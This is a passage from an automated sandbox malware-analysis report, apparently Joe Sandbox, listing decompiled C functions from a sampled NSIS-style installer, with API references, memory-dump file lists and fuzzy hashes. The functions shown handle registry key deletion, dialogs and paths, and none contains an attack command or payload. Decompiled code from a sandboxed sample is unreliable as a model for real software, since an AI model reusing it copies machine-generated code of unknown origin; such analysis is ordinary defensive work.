                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3916508600
                                                          • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                          • Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
                                                          • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                          • Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				short _v532;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E004060B9(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E00406626(3);
					if(_t28 == 0) {
						return RegDeleteKeyW(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}











                                                          0x00402d35
                                                          0x00402d3e
                                                          0x00402d47
                                                          0x00402d53
                                                          0x00402d5a
                                                          0x00402d7e
                                                          0x00402d64
                                                          0x00402d66
                                                          0x00402db9
                                                          0x00000000
                                                          0x00402dc1
                                                          0x00402d75
                                                          0x00402d7a
                                                          0x00402d7c
                                                          0x00000000
                                                          0x00000000
                                                          0x00402d7c
                                                          0x00402d98
                                                          0x00402da0
                                                          0x00402da7
                                                          0x00000000
                                                          0x00402dca
                                                          0x00000000
                                                          0x00402db2
                                                          0x00402dd4

                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Close$Enum
                                                          • String ID:
                                                          • API String ID: 464197530-0
                                                          • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                          • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                                          • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                          • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00402E5D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x418ea0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42a210;
						if(_t2 >  *0x42a210) {
							_t3 = CreateDialogParamW( *0x42a200, 0x6f, 0, E00402DD7, 0);
							 *0x418ea0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406662(0);
					}
				} else {
					_t6 =  *0x418ea0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x418ea0 = 0;
					return _t6;
				}
			}






                                                          0x00402e64
                                                          0x00402e7e
                                                          0x00402e84
                                                          0x00402e8e
                                                          0x00402e94
                                                          0x00402e9a
                                                          0x00402eab
                                                          0x00402eb4
                                                          0x00000000
                                                          0x00402eb9
                                                          0x00402ec0
                                                          0x00402e86
                                                          0x00402e8d
                                                          0x00402e8d
                                                          0x00402e66
                                                          0x00402e66
                                                          0x00402e6d
                                                          0x00402e70
                                                          0x00402e70
                                                          0x00402e76
                                                          0x00402e7d
                                                          0x00402e7d

                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                          • GetTickCount.KERNEL32 ref: 00402E8E
                                                          • CreateDialogParamW.USER32 ref: 00402EAB
                                                          • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                          • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                                          • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                          • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405C25 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E00405C25(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040624C(0x425ef0, _a4);
				_t21 = E00405BC8(0x425ef0);
				if(_t21 != 0) {
					E004064E0(_t21);
					if(( *0x42a21c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425ef0 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425ef0);
							_push(0x425ef0);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040658F();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405B69(0x425ef0);
								continue;
							} else {
								goto L1;
							}
						}
						E00405B1D();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                          0x00405c31
                                                          0x00405c3c
                                                          0x00405c40
                                                          0x00405c47
                                                          0x00405c53
                                                          0x00405c63
                                                          0x00405c65
                                                          0x00405c7d
                                                          0x00405c7e
                                                          0x00405c85
                                                          0x00405c86
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c69
                                                          0x00405c70
                                                          0x00405c78
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c70
                                                          0x00405c88
                                                          0x00000000
                                                          0x00405c9c
                                                          0x00405c55
                                                          0x00405c5b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c5b
                                                          0x00405c42
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                            • Part of subcall function 00405BC8: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,?,00405C3C,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,?,?,74D0FAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00000000), ref: 00405BD6
                                                            • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                                            • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,?,?,74D0FAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00000000), ref: 00405C7E
                                                          • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,?,?,74D0FAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,74D0FAA0), ref: 00405C8E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp
                                                          • API String ID: 3248276644-1924618205
                                                          • Opcode ID: c400ef1d1e731d117cbda643fc4ffe8eac790fafe02a6f7d9a7793559b5b74a4
                                                          • Instruction ID: 8cd04150762c6b8d6a28599447491585beeb2d0428c1c24898b3a9decc440bb2
                                                          • Opcode Fuzzy Hash: c400ef1d1e731d117cbda643fc4ffe8eac790fafe02a6f7d9a7793559b5b74a4
                                                          • Instruction Fuzzy Hash: 0BF0F42910DF1115E226323A1D0AEAF1555CE83364B4E053FF851B22C5DE3C9A538DAE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 89%
                                                          			E00405224(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x4236d4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x4236d4 = _t16;
							E00404BFA();
						}
						L11:
						return CallWindowProcW( *0x4236dc, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404B7A(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040422D(0x413);
				return 0;
			}





                                                          0x00405228
                                                          0x00405232
                                                          0x0040524e
                                                          0x00405270
                                                          0x00405273
                                                          0x00405279
                                                          0x00405283
                                                          0x00405284
                                                          0x00405286
                                                          0x0040528c
                                                          0x0040528c
                                                          0x00405296
                                                          0x00000000
                                                          0x004052a4
                                                          0x0040525b
                                                          0x00405293
                                                          0x00405293
                                                          0x00000000
                                                          0x00405293
                                                          0x00405267
                                                          0x00405269
                                                          0x00000000
                                                          0x00405269
                                                          0x00405238
                                                          0x00000000
                                                          0x00000000
                                                          0x0040523f
                                                          0x00000000

                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405253
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                                            • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                          • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                                          • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                          • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004038C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004038C5() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x4216ac;
				_t3 = E004038AA(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x4216ac =  *0x4216ac & 0x00000000;
				return _t3;
			}







                                                          0x004038c6
                                                          0x004038ce
                                                          0x004038d5
                                                          0x004038d8
                                                          0x004038d8
                                                          0x004038da
                                                          0x004038df
                                                          0x004038e6
                                                          0x004038ec
                                                          0x004038f0
                                                          0x004038f1
                                                          0x004038f9

                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74D0FAA0,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                                          • GlobalFree.KERNEL32 ref: 004038E6
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3916508600
                                                          • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                          • Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
                                                          • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                          • Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405B69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E00405B69(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                          0x00405b6a
                                                          0x00405b74
                                                          0x00405b77
                                                          0x00405b7d
                                                          0x00405b7e
                                                          0x00405b7f
                                                          0x00405b87
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405b87
                                                          0x00405b89
                                                          0x00405b91

                                                          APIs
                                                          • lstrlenW.KERNEL32(00438800,C:\Users\Public,00402F2D,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
                                                          • CharPrevW.USER32(00438800,00000000,00438800,C:\Users\Public,00402F2D,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B7F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\Public
                                                          • API String ID: 2709904686-2272764151
                                                          • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                          • Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
                                                          • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                          • Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}





















                                                          0x100010e6
